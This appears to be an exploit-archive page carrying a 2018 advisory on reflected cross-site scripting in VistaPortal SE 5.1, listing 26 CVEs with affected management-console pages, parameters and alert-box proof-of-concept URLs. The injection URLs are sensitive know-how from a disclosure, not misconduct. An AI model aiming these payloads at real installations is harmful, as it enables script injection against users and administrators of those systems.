exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

VistaPortal SE 5.1 Cross Site Scripting

VistaPortal SE 5.1 Cross Site Scripting
Posted Dec 7, 2018
Authored by Rafael Pedrero

VistaPortal SE version 5.1 build 51029 suffers from multiple cross site scripting vulnerabilities.

tags | exploit, vulnerability, xss
advisories | CVE-2018-19649, CVE-2018-19765, CVE-2018-19766, CVE-2018-19767, CVE-2018-19768, CVE-2018-19769, CVE-2018-19770, CVE-2018-19771, CVE-2018-19772, CVE-2018-19773, CVE-2018-19774, CVE-2018-19775, CVE-2018-19809, CVE-2018-19810, CVE-2018-19811, CVE-2018-19812, CVE-2018-19813, CVE-2018-19814, CVE-2018-19815, CVE-2018-19816, CVE-2018-19817, CVE-2018-19818, CVE-2018-19819, CVE-2018-19820, CVE-2018-19821, CVE-2018-19822
SHA-256 | f59d7577f26cbbecae2b1018571826aaba20798e7d44c6ce40b3d5c9b1d55316

VistaPortal SE 5.1 Cross Site Scripting

Change Mirror Download
Complete list: CVE-2018-19649, CVE-2018-19765, CVE-2018-19766,
CVE-2018-19767, CVE-2018-19768, CVE-2018-19769, CVE-2018-19770,
CVE-2018-19771, CVE-2018-19772, CVE-2018-19773, CVE-2018-19774,
CVE-2018-19775, CVE-2018-19809, CVE-2018-19810, CVE-2018-19811,
CVE-2018-19812, CVE-2018-19813, CVE-2018-19814, CVE-2018-19815,
CVE-2018-19816, CVE-2018-19817, CVE-2018-19818, CVE-2018-19819,
CVE-2018-19820, CVE-2018-19821, CVE-2018-19822

<!--
# Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build
51029)
# Date: 28-11-2018
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://www.infovista.com
# Software Link: http://www.infovista.com
# Version: VistaPortal SE Version 5.1 (build 51029)
# Tested on: all
# CVE : CVE-2018-19649
# Category: webapps

1. Description

Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029).
The page "RolePermissions.jsp" has reflected XSS via ConnPoolName parameter.


2. Proof of Concept

http://X.X.X.X/VPortal/mgtconsole/RolePermissions.jsp?ConnPoolName=default%27%22%3E%3CScRiPt%3Ealert%28%22xss%22%29%3C/ScRiPt%3E&accessPath=Configuration,Roles&loginPath=_VP_Configuration,_VP_Roles

Vulnerable parameter: ConnPoolName


3. Solution:

Solutions in next versions this product.
Patch:
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules

-->


<!--
# Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build
51029)
# Date: 28-11-2018
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://www.infovista.com
# Software Link: http://www.infovista.com
# Version: VistaPortal SE Version 5.1 (build 51029)
# Tested on: all
# CVE : CVE-2018-19765
# Category: webapps

1. Description

Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029).
The page "EditCurrentPresentSpace.jsp" has reflected XSS via ConnPoolName,
GroupId and ParentId parameters.


2. Proof of Concept

http://X.X.X.X/VPortal/mgtconsole/EditCurrentPresentSpace.jsp?ConnPoolName=default&GroupId=159&PageId=642&Category=root&ParentId=0
'"><ScRiPt>alert("xss")</ScRiPt>&type=U
http://X.X.X.X/VPortal/mgtconsole/EditCurrentPresentSpace.jsp?ConnPoolName=default&GroupId=159
'"><ScRiPt>alert("xss")</ScRiPt>&type=U&PageId=642&Category=root&ParentId=0
http://X.X.X.X/VPortal/mgtconsole/EditCurrentPresentSpace.jsp?ConnPoolName=
'"><ScRiPt>alert("xss")</ScRiPt>&type=U&GroupId=159&PageId=642&Category=root&ParentId=0

Vulnerable parameter: ConnPoolName, GroupId and ParentId


3. Solution:

Solutions in next versions this product.
Patch:
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules

-->


<!--
# Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build
51029)
# Date: 28-11-2018
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://www.infovista.com
# Software Link: http://www.infovista.com
# Version: VistaPortal SE Version 5.1 (build 51029)
# Tested on: all
# CVE : CVE-2018-19766
# Category: webapps

1. Description

Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029).
The page "GroupRessourceAdmin.jsp" has reflected XSS via ConnPoolName
parameter.


2. Proof of Concept

http://X.X.X.X/VPortal/mgtconsole/GroupRessourceAdmin.jsp?ConnPoolName='"><ScRiPt>alert("xss")</ScRiPt>&type=U&accessPath=Configuration,Security
Resources&loginPath=_VP_Configuration,_VP_Security_Resources

Vulnerable parameter: ConnPoolName


3. Solution:

Solutions in next versions this product.
Patch:
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules

-->


<!--
# Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build
51029)
# Date: 28-11-2018
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://www.infovista.com
# Software Link: http://www.infovista.com
# Version: VistaPortal SE Version 5.1 (build 51029)
# Tested on: all
# CVE : CVE-2018-19767
# Category: webapps

1. Description

Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029).
The page "PresentSpace.jsp" has reflected XSS via ConnPoolName and GroupId
parameters.


2. Proof of Concept

http://X.X.X.X/VPortal/mgtconsole/PresentSpace.jsp?type=P&GroupId=164&ConnPoolName='"><ScRiPt>alert("xss")</ScRiPt>&type=U&accessPath=Page
Packages,InfoVista
Solutions,ProServ,Test_Conectividad,Test_Conectividad_Package&loginPath=PagePackageMainFolder,InfoVista_Solutions,proserv,Test_Conectividad,Test_Conectividad_Package
http://X.X.X.X/VPortal/mgtconsole/PresentSpace.jsp?type=P&GroupId=164'"><ScRiPt>alert("xss")</ScRiPt>&type=U&ConnPoolName=default&accessPath=Page
Packages,InfoVista
Solutions,ProServ,Test_Conectividad,Test_Conectividad_Package&loginPath=PagePackageMainFolder,InfoVista_Solutions,proserv,Test_Conectividad,Test_Conectividad_Package

Vulnerable parameters: ConnPoolName and GroupId


3. Solution:

Solutions in next versions this product.
Patch:
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules

-->


<!--
# Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build
51029)
# Date: 28-11-2018
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://www.infovista.com
# Software Link: http://www.infovista.com
# Version: VistaPortal SE Version 5.1 (build 51029)
# Tested on: all
# CVE : CVE-2018-19768
# Category: webapps

1. Description

Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029).
The page "SubPagePackages.jsp" has reflected XSS via ConnPoolName and
GroupId parameters.


2. Proof of Concept

http://X.X.X.X/VPortal/mgtconsole/SubPagePackages.jsp?type=F&GroupId=5&DispProfile=true&ConnPoolName='"><ScRiPt>alert("xss")</ScRiPt>&type=U&accessPath=Page
Packages&loginPath=PagePackageMainFolder
http://X.X.X.X/VPortal/mgtconsole/SubPagePackages.jsp?type=F&GroupId=5'"><ScRiPt>alert("xss")</ScRiPt>&type=U&DispProfile=true&ConnPoolName=default&accessPath=Page
Packages&loginPath=PagePackageMainFolder

Vulnerable parameters: ConnPoolName and GroupId


3. Solution:

Solutions in next versions this product.
Patch:
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules

-->


<!--
# Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build
51029)
# Date: 28-11-2018
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://www.infovista.com
# Software Link: http://www.infovista.com
# Version: VistaPortal SE Version 5.1 (build 51029)
# Tested on: all
# CVE : CVE-2018-19769
# Category: webapps

1. Description

Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029).
The page "UserProperties.jsp" has reflected XSS via ConnPoolName.


2. Proof of Concept

http://X.X.X.X/VPortal/mgtconsole/UserProperties.jsp?ConnPoolName='"><ScRiPt>alert("xss")</ScRiPt>&type=U&accessPath=Configuration,User
Properties&loginPath=_VP_Configuration,_VP_User_Propertie

Vulnerable parameters: ConnPoolName


3. Solution:

Solutions in next versions this product.
Patch:
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules

-->


<!--
# Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build
51029)
# Date: 28-11-2018
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://www.infovista.com
# Software Link: http://www.infovista.com
# Version: VistaPortal SE Version 5.1 (build 51029)
# Tested on: all
# CVE : CVE-2018-19770
# Category: webapps

1. Description

Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029).
The page "Users.jsp" has reflected XSS via ConnPoolName.


2. Proof of Concept

http://X.X.X.X/VPortal/mgtconsole/Users.jsp?GZIP=false&type=G&GroupId=6&DispProfile=true&ConnPoolName='"><ScRiPt>alert("xss")</ScRiPt>&type=U&accessPath=All,InfoVista
Solutions Users Groups&loginPath=All,InfoVista_Solutions_Users_Groups

Vulnerable parameters: ConnPoolName


3. Solution:

Solutions in next versions this product.
Patch:
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules

-->


<!--
# Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build
51029)
# Date: 28-11-2018
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://www.infovista.com
# Software Link: http://www.infovista.com
# Version: VistaPortal SE Version 5.1 (build 51029)
# Tested on: all
# CVE : CVE-2018-19771
# Category: webapps

1. Description

Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029).
The page "EditCurrentPool.jsp" has reflected XSS via PropName parameter.


2. Proof of Concept

http://X.X.X.X/VPortal/mgtconsole/EditCurrentPool.jsp?PropName='"><ScRiPt>alert("xss")</ScRiPt>&type=U&accessPath=Configuration,VistaPortalA(r)
Database
Connection&loginPath=_VP_Configuration,_VP_VistaPortal_Database_Connection

Vulnerable parameter: PropName


3. Solution:

Solutions in next versions this product.
Patch:
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules

-->


<!--
# Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build
51029)
# Date: 28-11-2018
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://www.infovista.com
# Software Link: http://www.infovista.com
# Version: VistaPortal SE Version 5.1 (build 51029)
# Tested on: all
# CVE : CVE-2018-19772
# Category: webapps

1. Description

Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029).
The page "EditCurrentPresentSpace.jsp" has reflected XSS via ConnPoolName,
GroupId and ParentId parameters.


2. Proof of Concept

http://X.X.X.X/VPortal/mgtconsole/EditCurrentPresentSpace.jsp?ConnPoolName=default&GroupId=4&PageId=1&Category=root&ParentId=0
'"><ScRiPt>alert("xss")</ScRiPt>&type=U
http://X.X.X.X/VPortal/mgtconsole/EditCurrentPresentSpace.jsp?ConnPoolName=default&GroupId=4
'"><ScRiPt>alert("xss")</ScRiPt>&type=U&PageId=1&Category=root&ParentId=0
http://X.X.X.X/VPortal/mgtconsole/EditCurrentPresentSpace.jsp?ConnPoolName=
'"><ScRiPt>alert("xss")</ScRiPt>&type=U&GroupId=4&PageId=1&Category=root&ParentId=0

Vulnerable parameter: ConnPoolName, GroupId and ParentId


3. Solution:

Solutions in next versions this product.
Patch:
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules

-->


<!--
# Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build
51029)
# Date: 28-11-2018
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://www.infovista.com
# Software Link: http://www.infovista.com
# Version: VistaPortal SE Version 5.1 (build 51029)
# Tested on: all
# CVE : CVE-2018-19773
# Category: webapps

1. Description

Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029).
The page "EditCurrentUser.jsp" has reflected XSS via GroupId and
ConnPoolName parameters.


2. Proof of Concept

http://X.X.X.X/VPortal/mgtconsole/EditCurrentUser.jsp?GroupId=4&ConnPoolName='"><ScRiPt>alert("xss")</ScRiPt>&type=U&accessPath=All,Super
Administrator&loginPath=All,_superadmin_shadow_
http://X.X.X.X/VPortal/mgtconsole/EditCurrentUser.jsp?GroupId=4'"><ScRiPt>alert("xss")</ScRiPt>&type=U&ConnPoolName=default&accessPath=All,Super
Administrator&loginPath=All,_superadmin_shadow_

Vulnerable parameter: GroupId and ConnPoolName


3. Solution:

Solutions in next versions this product.
Patch:
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules

-->


<!--
# Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build
51029)
# Date: 28-11-2018
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://www.infovista.com
# Software Link: http://www.infovista.com
# Version: VistaPortal SE Version 5.1 (build 51029)
# Tested on: all
# CVE : CVE-2018-19774
# Category: webapps

1. Description

Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029).
The page "PresentSpace.jsp" has reflected XSS via GroupId and ConnPoolName
parameters.


2. Proof of Concept

http://X.X.X.X/VPortal/mgtconsole/PresentSpace.jsp?GroupId=4&ConnPoolName=
'"><ScRiPt>alert("xss")</ScRiPt>&type=U&type=U
http://X.X.X.X/VPortal/mgtconsole/PresentSpace.jsp?GroupId=4
'"><ScRiPt>alert("xss")</ScRiPt>&type=U&ConnPoolName=default&type=U

Vulnerable parameter: GroupId and ConnPoolName


3. Solution:

Solutions in next versions this product.
Patch:
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules

-->


<!--
# Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build
51029)
# Date: 28-11-2018
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://www.infovista.com
# Software Link: http://www.infovista.com
# Version: VistaPortal SE Version 5.1 (build 51029)
# Tested on: all
# CVE : CVE-2018-19775
# Category: webapps

1. Description

Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029).
The page "Variables.jsp" has reflected XSS via ConnPoolName and GroupId
parameter.


2. Proof of Concept

http://X.X.X.X/VPortal/mgtconsole/Variables.jsp?ConnPoolName=default&GroupId=4
'"><ScRiPt>alert("xss")</ScRiPt>&type=U&CurrentFolder=AdHo
http://X.X.X.X/VPortal/mgtconsole/Variables.jsp?ConnPoolName=
'"><ScRiPt>alert("xss")</ScRiPt>&type=U&GroupId=4&CurrentFolder=AdHo

Vulnerable parameter: ConnPoolName and GroupId


3. Solution:

Solutions in next versions this product.
Patch:
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules

-->

<!--
# Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build
51029)
# Date: 28-11-2018
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://www.infovista.com
# Software Link: http://www.infovista.com
# Version: VistaPortal SE Version 5.1 (build 51029)
# Tested on: all
# CVE : CVE-2018-19809
# Category: webapps

1. Description

Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029).
The page "/VPortal/mgtconsole/GroupCopy.jsp" has reflected XSS via
ConnPoolName, GroupId and type parameters.


2. Proof of Concept

http://X.X.X.X/VPortal/mgtconsole/GroupCopy.jsp?type=P&GroupUserId=159&ConnPoolName=
'"><ScRiPt>alert("xss")</ScRiPt>
http://X.X.X.X/VPortal/mgtconsole/GroupCopy.jsp?type=P&GroupUserId=159
'"><ScRiPt>alert("xss")</ScRiPt>&ConnPoolName=default
http://X.X.X.X/VPortal/mgtconsole/GroupCopy.jsp?type=P
'"><ScRiPt>alert("xss")</ScRiPt>&GroupUserId=159&ConnPoolName=default

Vulnerable parameter: ConnPoolName, GroupId and type


3. Solution:

Solutions in next versions this product.
Patch:
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules

-->


<!--
# Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build
51029)
# Date: 28-11-2018
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://www.infovista.com
# Software Link: http://www.infovista.com
# Version: VistaPortal SE Version 5.1 (build 51029)
# Tested on: all
# CVE : CVE-2018-19810
# Category: webapps

1. Description

Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029).
The page "/VPortal/mgtconsole/GroupMove.jsp" has reflected XSS via
ConnPoolName, GroupId and type parameters.


2. Proof of Concept

http://X.X.X.X/VPortal/mgtconsole/GroupMove.jsp?type=P&GroupUserId=159&ConnPoolName=
'"><ScRiPt>alert("xss")</ScRiPt>
http://X.X.X.X/VPortal/mgtconsole/GroupMove.jsp?type=P
'"><ScRiPt>alert("xss")</ScRiPt>&GroupUserId=159&ConnPoolName=default

Vulnerable parameter: ConnPoolName and type


3. Solution:

Solutions in next versions this product.
Patch:
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules

-->


<!--
# Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build
51029)
# Date: 28-11-2018
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://www.infovista.com
# Software Link: http://www.infovista.com
# Version: VistaPortal SE Version 5.1 (build 51029)
# Tested on: all
# CVE : CVE-2018-19811
# Category: webapps

1. Description

Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029).
The page "/VPortal/mgtconsole/Import.jsp" has reflected XSS via
ConnPoolName parameter.


2. Proof of Concept

http://X.X.X.X/VPortal/mgtconsole/Import.jsp?type=Package&GroupUserId=159&ConnPoolName=
'"><ScRiPt>alert("xss")</ScRiPt>&ImportAs=159


Vulnerable parameter: ConnPoolName


3. Solution:

Solutions in next versions this product.
Patch:
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules

-->


<!--
# Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build
51029)
# Date: 28-11-2018
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://www.infovista.com
# Software Link: http://www.infovista.com
# Version: VistaPortal SE Version 5.1 (build 51029)
# Tested on: all
# CVE : CVE-2018-19812
# Category: webapps

1. Description

Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029).
The page "/VPortal/mgtconsole/SubFolderPackages.jsp" has reflected XSS via
GroupId parameter.


2. Proof of Concept

http://X.X.X.X/VPortal/mgtconsole/SubFolderPackages.jsp?GroupId=5
'"><ScRiPt>alert("xss")</ScRiPt>&ConnPoolName=default&type=F

Vulnerable parameter: GroupId


3. Solution:

Solutions in next versions this product.
Patch:
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules

-->


<!--
# Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build
51029)
# Date: 28-11-2018
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://www.infovista.com
# Software Link: http://www.infovista.com
# Version: VistaPortal SE Version 5.1 (build 51029)
# Tested on: all
# CVE : CVE-2018-19813
# Category: webapps

1. Description

Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029).
The page "/VPortal/mgtconsole/Subscribers.jsp" has reflected XSS via
ConnPoolName and GroupId parameters.


2. Proof of Concept

http://X.X.X.X/VPortal/mgtconsole/Subscribers.jsp?GroupId=159&ConnPoolName=
'"><ScRiPt>alert("xss")</ScRiPt>&type=P
http://X.X.X.X/VPortal/mgtconsole/Subscribers.jsp?GroupId=159
'"><ScRiPt>alert("xss")</ScRiPt>&ConnPoolName=default&type=P

Vulnerable parameter: ConnPoolName and GroupId


3. Solution:

Solutions in next versions this product.
Patch:
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules

-->


<!--
# Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build
51029)
# Date: 28-11-2018
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://www.infovista.com
# Software Link: http://www.infovista.com
# Version: VistaPortal SE Version 5.1 (build 51029)
# Tested on: all
# CVE : CVE-2018-19814
# Category: webapps

1. Description

Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029).
The page "/VPortal/mgtconsole/Subscriptions.jsp" has reflected XSS via
ConnPoolName and GroupId parameters.


2. Proof of Concept

http://X.X.X.X/VPortal/mgtconsole/Subscriptions.jsp?GroupId=159&ConnPoolName=default&type=P
'"><ScRiPt>alert("xss")</ScRiPt>
http://X.X.X.X/VPortal/mgtconsole/Subscriptions.jsp?GroupId=159&ConnPoolName=
'"><ScRiPt>alert("xss")</ScRiPt>&type=P
http://X.X.X.X/VPortal/mgtconsole/Subscriptions.jsp?GroupId=159
'"><ScRiPt>alert("xss")</ScRiPt>&ConnPoolName=default&type=P

Vulnerable parameter: ConnPoolName, GroupId and type


3. Solution:

Solutions in next versions this product.
Patch:
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules

-->


<!--
# Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build
51029)
# Date: 28-11-2018
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://www.infovista.com
# Software Link: http://www.infovista.com
# Version: VistaPortal SE Version 5.1 (build 51029)
# Tested on: all
# CVE : CVE-2018-19815
# Category: webapps

1. Description

Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029).
The page "/VPortal/mgtconsole/UserPopupAddNewProp.jsp" has reflected XSS
via ConnPoolName parameter.


2. Proof of Concept

http://X.X.X.X/VPortal/mgtconsole/UserPopupAddNewProp.jsp?ConnPoolName=
'"><ScRiPt>alert("xss")</ScRiPt>

Vulnerable parameter: ConnPoolName


3. Solution:

Solutions in next versions this product.
Patch:
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules

-->


<!--
# Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build
51029)
# Date: 28-11-2018
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://www.infovista.com
# Software Link: http://www.infovista.com
# Version: VistaPortal SE Version 5.1 (build 51029)
# Tested on: all
# CVE : CVE-2018-19816
# Category: webapps

1. Description

Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029).
The page "/VPortal/mgtconsole/categorytree/ChooseCategory.jsp" has
reflected XSS via ConnPoolName parameter.


2. Proof of Concept

http://X.X.X.X/VPortal/mgtconsole/categorytree/ChooseCategory.jsp?ConnPoolName=
'"><ScRiPt>alert("xss")</ScRiPt>

Vulnerable parameter: ConnPoolName


3. Solution:

Solutions in next versions this product.
Patch:
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules

-->


<!--
# Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build
51029)
# Date: 28-11-2018
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://www.infovista.com
# Software Link: http://www.infovista.com
# Version: VistaPortal SE Version 5.1 (build 51029)
# Tested on: all
# CVE : CVE-2018-19817
# Category: webapps

1. Description

Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029).
The page "/VPortal/mgtconsole/AdminAuthorisationFrame.jsp" has reflected
XSS via ConnPoolName and GroupId parameters.


2. Proof of Concept

http://X.X.X.X/VPortal/mgtconsole/AdminAuthorisationFrame.jsp?GroupId=4&UserId=4&ConnPoolName=
'"><ScRiPt>alert("xss")</ScRiPt>&type=U
http://X.X.X.X/VPortal/mgtconsole/AdminAuthorisationFrame.jsp?GroupId=4
'"><ScRiPt>alert("xss")</ScRiPt>&UserId=4&ConnPoolName=default&type=U

Vulnerable parameter: ConnPoolName and GroupId


3. Solution:

Solutions in next versions this product.
Patch:
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules

-->


<!--
# Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build
51029)
# Date: 28-11-2018
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://www.infovista.com
# Software Link: http://www.infovista.com
# Version: VistaPortal SE Version 5.1 (build 51029)
# Tested on: all
# CVE : CVE-2018-19818
# Category: webapps

1. Description

Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029).
The page "/VPortal/mgtconsole/Contacts.jsp" has reflected XSS via
ConnPoolName parameter.


2. Proof of Concept

http://X.X.X.X/VPortal/mgtconsole/Contacts.jsp?GroupId=4&ConnPoolName=
'"><ScRiPt>alert("xss")</ScRiPt>&type=U

Vulnerable parameter: ConnPoolName


3. Solution:

Solutions in next versions this product.
Patch:
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules

-->


<!--
# Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build
51029)
# Date: 28-11-2018
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://www.infovista.com
# Software Link: http://www.infovista.com
# Version: VistaPortal SE Version 5.1 (build 51029)
# Tested on: all
# CVE : CVE-2018-19819
# Category: webapps

1. Description

Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029).
The page "/VPortal/mgtconsole/Rights.jsp" has reflected XSS via
ConnPoolName parameter.


2. Proof of Concept

http://X.X.X.X/VPortal/mgtconsole/Rights.jsp?GroupId=4&ConnPoolName=
'"><ScRiPt>alert("xss")</ScRiPt>&type=U

Vulnerable parameter: ConnPoolName


3. Solution:

Solutions in next versions this product.
Patch:
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules

-->


<!--
# Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build
51029)
# Date: 28-11-2018
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://www.infovista.com
# Software Link: http://www.infovista.com
# Version: VistaPortal SE Version 5.1 (build 51029)
# Tested on: all
# CVE : CVE-2018-19820
# Category: webapps

1. Description

Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029).
The page "/VPortal/mgtconsole/Roles.jsp" has reflected XSS via ConnPoolName
parameter.


2. Proof of Concept

http://X.X.X.X/VPortal/mgtconsole/Roles.jsp?GroupId=4&ConnPoolName=
'"><ScRiPt>alert("xss")</ScRiPt>&type=U

Vulnerable parameter: ConnPoolName


3. Solution:

Solutions in next versions this product.
Patch:
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules

-->


<!--
# Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build
51029)
# Date: 28-11-2018
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://www.infovista.com
# Software Link: http://www.infovista.com
# Version: VistaPortal SE Version 5.1 (build 51029)
# Tested on: all
# CVE : CVE-2018-19821
# Category: webapps

1. Description

Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029).
The page "/VPortal/mgtconsole/SecurityPolicies.jsp" has reflected XSS via
ConnPoolName parameter.


2. Proof of Concept

http://X.X.X.X/VPortal/mgtconsole/SecurityPolicies.jsp?GroupId=4&ConnPoolName=
'"><ScRiPt>alert("xss")</ScRiPt>&type=U

Vulnerable parameter: ConnPoolName


3. Solution:

Solutions in next versions this product.
Patch:
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules

-->


<!--
# Exploit Title: Cross Site Scripting in VistaPortal SE Version 5.1 (build
51029)
# Date: 28-11-2018
# Exploit Author: Rafael Pedrero
# Vendor Homepage: http://www.infovista.com
# Software Link: http://www.infovista.com
# Version: VistaPortal SE Version 5.1 (build 51029)
# Tested on: all
# CVE : CVE-2018-19822
# Category: webapps

1. Description

Cross Site Scripting exists in VistaPortal SE Version 5.1 (build 51029).
The page "/VPortal/mgtconsole/SharedCriteria.jsp" has reflected XSS via
ConnPoolName and GroupId parameters.


2. Proof of Concept

http://X.X.X.X/VPortal/mgtconsole/SharedCriteria.jsp?GroupId=4&ConnPoolName=
'"><ScRiPt>alert("xss")</ScRiPt>&type=U
http://X.X.X.X/VPortal/mgtconsole/SharedCriteria.jsp?GroupId=4
'"><ScRiPt>alert("xss")</ScRiPt>&ConnPoolName=default&type=U

Vulnerable parameter: ConnPoolName and GroupId


3. Solution:

Solutions in next versions this product.
Patch:
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet#XSS_Prevention_Rules

-->


Login or Register to add favorites

File Archive:

June 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jun 1st
    0 Files
  • 2
    Jun 2nd
    0 Files
  • 3
    Jun 3rd
    18 Files
  • 4
    Jun 4th
    21 Files
  • 5
    Jun 5th
    0 Files
  • 6
    Jun 6th
    57 Files
  • 7
    Jun 7th
    6 Files
  • 8
    Jun 8th
    0 Files
  • 9
    Jun 9th
    0 Files
  • 10
    Jun 10th
    12 Files
  • 11
    Jun 11th
    27 Files
  • 12
    Jun 12th
    38 Files
  • 13
    Jun 13th
    16 Files
  • 14
    Jun 14th
    14 Files
  • 15
    Jun 15th
    0 Files
  • 16
    Jun 16th
    0 Files
  • 17
    Jun 17th
    16 Files
  • 18
    Jun 18th
    26 Files
  • 19
    Jun 19th
    15 Files
  • 20
    Jun 20th
    18 Files
  • 21
    Jun 21st
    8 Files
  • 22
    Jun 22nd
    0 Files
